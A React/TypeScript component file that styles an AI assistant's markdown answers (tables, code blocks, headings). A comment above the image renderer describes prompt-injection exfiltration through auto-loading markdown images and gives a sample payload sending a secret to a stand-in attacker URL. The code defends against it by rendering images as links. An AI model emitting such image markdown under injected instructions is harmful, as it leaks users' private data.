'use client';

import '@assistant-ui/react-markdown/styles/dot.css';

import {
  type CodeHeaderProps,
  MarkdownTextPrimitive,
  unstable_memoizeMarkdownComponents as memoizeMarkdownComponents,
  useIsMarkdownCodeBlock,
} from '@assistant-ui/react-markdown';
import remarkGfm from 'remark-gfm';
import { type ComponentProps, type FC, memo, useEffect, useRef, useState } from 'react';
import { OrderedList, listClass } from './ordered-list';
import { CheckIcon, CopyIcon } from 'lucide-react';

import { TooltipIconButton } from '@/components/assistant-ui/tooltip-icon-button';
import { cn } from '@/lib/utils';
import { useChatCopy } from '@/lib/chat-i18n';
import { CitationLink } from '@/citations/citation-link';

/**
 * A plain number as a table shows it: digits with group and decimal marks, an
 * optional sign, and an optional %, currency symbol or three-letter code (or kr).
 * Phone numbers and dotted dates also match; right-aligned, they still read well.
 */
const NUMBER =
  /^(?:[$€£¥]\s?)?[+\-\u2212]?[$€£¥]?\d[\d\s.,'\u00a0\u202f]*(?:%|\s?(?:[$€£¥]|kr|[A-Z]{3}))?$/u;
/** A cell that stands in for a missing value: it neither makes nor breaks a numeric column. */
const PLACEHOLDER = /^(?:[-\u2013\u2014]|n\/a)$/iu;

/**
 * Marks the columns whose every filled body cell is a number, so they sit
 * narrow and right-aligned (DES1 HC-11). A column the markdown already aligns
 * keeps its own alignment.
 */
function markNumericColumns(table: HTMLTableElement) {
  const rows = [...table.rows];
  const body = rows.filter((row) => row.parentElement?.tagName !== 'THEAD');
  const columns = Math.max(0, ...rows.map((row) => row.cells.length));
  for (let column = 0; column < columns; column += 1) {
    const values = body
      .map((row) => row.cells[column]?.textContent?.trim() ?? '')
      .filter((value) => value && !PLACEHOLDER.test(value));
    const numeric = values.length > 0 && values.every((value) => NUMBER.test(value));
    for (const row of rows) {
      const cell = row.cells[column];
      if (!cell) continue;
      // react-markdown writes a column's own alignment as an inline text-align.
      if (numeric && !cell.style.textAlign && !cell.getAttribute('align'))
        cell.setAttribute('data-numeric', 'true');
      else cell.removeAttribute('data-numeric');
    }
  }
}

type TableScroll = { overflow: boolean; atEnd: boolean; size: number; start: number };
const sameScroll = (a: TableScroll, b: TableScroll) =>
  a.overflow === b.overflow &&
  a.atEnd === b.atEnd &&
  Math.abs(a.size - b.size) < 0.001 &&
  Math.abs(a.start - b.start) < 0.001;

/**
 * A GFM table sized to its content (DES1 HC-11). A table cannot shrink below
 * its min-content width, so a wide one scrolls in a block-level container of
 * its own (overflow on the <table> box is ignored); overscroll and
 * touch-action containment keep that scroll from bleeding into vertical
 * panning or edge-swipe navigation. While it overflows, the first column stays
 * put, the right edge fades until the end is reached, and a track under the
 * table shows how much there is, also where the platform hides scrollbars.
 */
function MarkdownTable({ className, ...props }: ComponentProps<'table'>) {
  const scroller = useRef<HTMLDivElement>(null);
  const table = useRef<HTMLTableElement>(null);
  const [scroll, setScroll] = useState<TableScroll>({
    overflow: false,
    atEnd: true,
    size: 1,
    start: 0,
  });
  useEffect(() => {
    const box = scroller.current;
    const grid = table.current;
    if (!box || !grid) return;
    let frame = 0;
    const measure = () => {
      frame = 0;
      markNumericColumns(grid);
      const width = Math.max(box.scrollWidth, 1);
      const next = {
        overflow: box.scrollWidth > box.clientWidth + 1,
        atEnd: box.scrollLeft + box.clientWidth >= box.scrollWidth - 1,
        size: Math.min(1, box.clientWidth / width),
        start: box.scrollLeft / width,
      };
      setScroll((current) => (sameScroll(current, next) ? current : next));
    };
    const schedule = () => {
      if (!frame) frame = window.requestAnimationFrame(measure);
    };
    measure();
    box.addEventListener('scroll', schedule, { passive: true });
    const resize = typeof ResizeObserver === 'function' ? new ResizeObserver(schedule) : null;
    resize?.observe(box);
    resize?.observe(grid);
    // A streamed answer adds rows and text after the first render.
    const mutation = typeof MutationObserver === 'function' ? new MutationObserver(schedule) : null;
    mutation?.observe(grid, { childList: true, subtree: true, characterData: true });
    return () => {
      if (frame) window.cancelAnimationFrame(frame);
      box.removeEventListener('scroll', schedule);
      resize?.disconnect();
      mutation?.disconnect();
    };
  }, []);
  return (
    <div
      className="aui-md-table-frame"
      data-overflow={scroll.overflow ? 'true' : undefined}
      data-at-end={scroll.atEnd ? 'true' : undefined}
    >
      <div
        ref={scroller}
        className="aui-md-table-wrapper border-border/70 rounded-xl border [overscroll-behavior-x:contain] [touch-action:pan-x_pan-y_pinch-zoom]"
      >
        <table
          ref={table}
          className={cn('aui-md-table border-separate border-spacing-0', className)}
          {...props}
        />
      </div>
      {scroll.overflow && (
        <div className="aui-md-table-track" aria-hidden="true">
          <span
            style={{
              width: `${scroll.size * 100}%`,
              transform: `translateX(${(scroll.start / scroll.size) * 100}%)`,
            }}
          />
        </div>
      )}
    </div>
  );
}

const MarkdownTextImpl = () => {
  return (
    <MarkdownTextPrimitive
      remarkPlugins={[remarkGfm]}
      className="aui-md"
      components={defaultComponents}
      defer
    />
  );
};

export const MarkdownText = memo(MarkdownTextImpl);

const CodeHeader: FC<CodeHeaderProps> = ({ language, code }) => {
  const { isCopied, copyToClipboard } = useCopyToClipboard();
  const copy = useChatCopy();
  const onCopy = () => {
    if (!code || isCopied) return;
    copyToClipboard(code);
  };

  return (
    <div className="aui-code-header-root border-border/70 bg-muted/50 mt-3 flex items-center justify-between rounded-t-xl border border-b-0 px-3.5 py-1.5 text-xs">
      <span className="aui-code-header-language text-muted-foreground font-medium lowercase">
        {language}
      </span>
      <TooltipIconButton tooltip={copy.copy} onClick={onCopy}>
        {!isCopied && <CopyIcon className="animate-in zoom-in-75 fade-in duration-150" />}
        {isCopied && <CheckIcon className="animate-in zoom-in-50 fade-in duration-200 ease-out" />}
      </TooltipIconButton>
    </div>
  );
};

const useCopyToClipboard = ({
  copiedDuration = 3000,
}: {
  copiedDuration?: number;
} = {}) => {
  const [isCopied, setIsCopied] = useState<boolean>(false);

  const copyToClipboard = (value: string) => {
    if (!value || typeof navigator === 'undefined' || !navigator.clipboard) {
      return;
    }

    navigator.clipboard.writeText(value).then(
      () => {
        setIsCopied(true);
        setTimeout(() => setIsCopied(false), copiedDuration);
      },
      () => {},
    );
  };

  return { isCopied, copyToClipboard };
};

const SafeImageLink = ({ src, alt }: { src?: string | Blob; alt?: string }) => {
  const copy = useChatCopy();
  return (
    <a
      href={typeof src === 'string' ? src : undefined}
      target="_blank"
      rel="noopener noreferrer"
      className="aui-md-a text-primary hover:text-primary/80 underline underline-offset-2"
    >
      🖼 {alt || copy.image} ({copy.openLink})
    </a>
  );
};

// Answer rhythm (DESIGN-SPEC §3.4): body 14/24 with 12 px between blocks;
// h1 and h2 share the 16/24 section style (24 above, 8 below); h3 and h4 are
// 14/22 (20 above, 6 below). The answer never gets a page-title heading.
const sectionHeadingClass =
  'mt-6 mb-2 scroll-m-20 text-base leading-6 font-title tracking-normal first:mt-0 last:mb-0';
const subheadingClass =
  'mt-5 mb-1.5 scroll-m-20 text-sm leading-5.5 tracking-normal first:mt-0 last:mb-0';

const defaultComponents = memoizeMarkdownComponents({
  h1: ({ className, ...props }) => (
    <h1 className={cn('aui-md-h1', sectionHeadingClass, className)} {...props} />
  ),
  h2: ({ className, ...props }) => (
    <h2 className={cn('aui-md-h2', sectionHeadingClass, className)} {...props} />
  ),
  h3: ({ className, ...props }) => (
    <h3 className={cn('aui-md-h3 font-title', subheadingClass, className)} {...props} />
  ),
  h4: ({ className, ...props }) => (
    <h4 className={cn('aui-md-h4 font-medium', subheadingClass, className)} {...props} />
  ),
  h5: ({ className, ...props }) => (
    <h5
      className={cn('aui-md-h5 mt-3 mb-1 text-sm font-semibold first:mt-0 last:mb-0', className)}
      {...props}
    />
  ),
  h6: ({ className, ...props }) => (
    <h6
      className={cn('aui-md-h6 mt-3 mb-1 text-sm font-medium first:mt-0 last:mb-0', className)}
      {...props}
    />
  ),
  p: ({ className, ...props }) => (
    <p className={cn('aui-md-p my-3 leading-6 first:mt-0 last:mb-0', className)} {...props} />
  ),
  a: ({ className, href, ...props }) => (
    <CitationLink
      {...props}
      href={href}
      className={cn(
        'aui-md-a text-primary hover:text-primary/80 underline underline-offset-2',
        className,
      )}
    />
  ),
  // Assistant-authored markdown images are a classic prompt-injection
  // exfiltration channel: an injected `![](https://attacker/?d=<secret>)`
  // would auto-fetch on render, leaking whatever private context (memories,
  // settings, connector data) the attacker encoded into the URL — the exact
  // vector behind EchoLeak (CVE-2025-32711) and ShadowLeak. Render a
  // click-to-open link instead of fetching: the user sees the URL, nothing
  // loads automatically. view_image remains the sanctioned way for the MODEL
  // to see images; pack results render product images through the app's own
  // components, not assistant markdown.
  img: SafeImageLink,
  blockquote: ({ className, ...props }) => (
    <blockquote
      className={cn(
        'aui-md-blockquote border-muted-foreground/30 text-muted-foreground my-3 border-s-2 ps-4',
        className,
      )}
      {...props}
    />
  ),
  ul: ({ className, ...props }) => (
    <ul className={cn('aui-md-ul list-disc ms-5.5', listClass, className)} {...props} />
  ),
  ol: OrderedList,
  hr: ({ className, ...props }) => (
    <hr className={cn('aui-md-hr border-muted-foreground/20 my-3', className)} {...props} />
  ),
  table: MarkdownTable,
  th: ({ className, ...props }) => (
    <th
      className={cn(
        'aui-md-th text-muted-foreground px-3.5 py-2 text-start text-[13px] font-medium tracking-[0.01em] wrap-break-word [[align=center]]:text-center [[align=right]]:text-right',
        className,
      )}
      {...props}
    />
  ),
  td: ({ className, ...props }) => (
    <td
      className={cn(
        'aui-md-td border-border/70 border-t px-3.5 py-2 text-start wrap-break-word [[align=center]]:text-center [[align=right]]:text-right',
        className,
      )}
      {...props}
    />
  ),
  tr: ({ className, ...props }) => <tr className={cn('aui-md-tr m-0 p-0', className)} {...props} />,
  li: ({ className, ...props }) => (
    <li className={cn('aui-md-li leading-6', className)} {...props} />
  ),
  strong: ({ className, ...props }) => (
    <strong className={cn('aui-md-strong font-semibold', className)} {...props} />
  ),
  sup: ({ className, ...props }) => (
    <sup className={cn('aui-md-sup [&>a]:text-xs [&>a]:no-underline', className)} {...props} />
  ),
  pre: ({ className, ...props }) => (
    <pre
      className={cn(
        'aui-md-pre border-border/70 bg-muted/30 overflow-x-auto rounded-t-none rounded-b-xl border border-t-0 p-3.5 font-mono text-[13px] leading-relaxed',
        className,
      )}
      {...props}
    />
  ),
  code: function Code({ className, ...props }) {
    const isCodeBlock = useIsMarkdownCodeBlock();
    return (
      <code
        className={cn(
          !isCodeBlock &&
            'aui-md-inline-code bg-muted rounded-md px-1.5 py-0.5 font-mono text-[0.85em]',
          className,
        )}
        {...props}
      />
    );
  },
  CodeHeader,
});

/** The answer's element renderers, for the rhythm and geometry tests. */
export const markdownComponents = defaultComponents;
